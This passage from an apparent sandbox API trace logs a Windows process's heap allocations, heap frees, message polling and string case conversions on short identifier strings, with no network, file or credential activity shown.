lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0259.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0259.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0259.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0259.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0259.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0259.041] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0259.041] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0259.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0259.041] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0259.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0259.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0259.042] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0259.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0259.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0259.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0259.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0259.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0259.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0259.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0259.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0259.042] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0259.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0259.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0259.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0259.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0259.043] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0259.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0259.043] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0259.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0259.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0259.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0259.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0259.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0259.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0259.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0259.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0259.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0259.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0259.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0259.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0259.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0259.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0259.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0259.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0259.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0259.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0259.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0259.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0259.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0259.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0259.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0259.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0259.045] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0259.045] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0259.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0259.045] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0259.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0259.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0259.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0259.045] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0259.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0259.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0259.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0259.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0259.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0259.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0259.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0259.046] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0259.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0259.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0259.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0259.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0259.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0259.047] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0259.047] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0259.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0259.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0259.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0259.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0259.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0259.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0259.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0259.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0259.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0259.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0259.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0259.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0259.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0259.048] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0259.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0259.048] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0259.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0259.048] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0259.048] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0259.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0259.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0259.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0259.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0259.049] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0259.049] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0259.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0259.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0259.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0259.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0259.049] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0259.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0259.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0259.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0259.050] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0259.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0259.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0259.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0259.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0259.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0259.050] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0259.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0259.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0259.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0259.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0259.051] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0259.051] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0259.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0259.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0259.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0259.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0259.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0259.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0259.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0259.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0259.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0259.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0259.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0259.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0259.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0259.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0259.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0259.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0259.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0259.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0259.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c9650 | out: hHeap=0x25c0000) returned 1 [0259.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0259.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0259.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0259.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0259.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0259.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0259.055] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0259.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 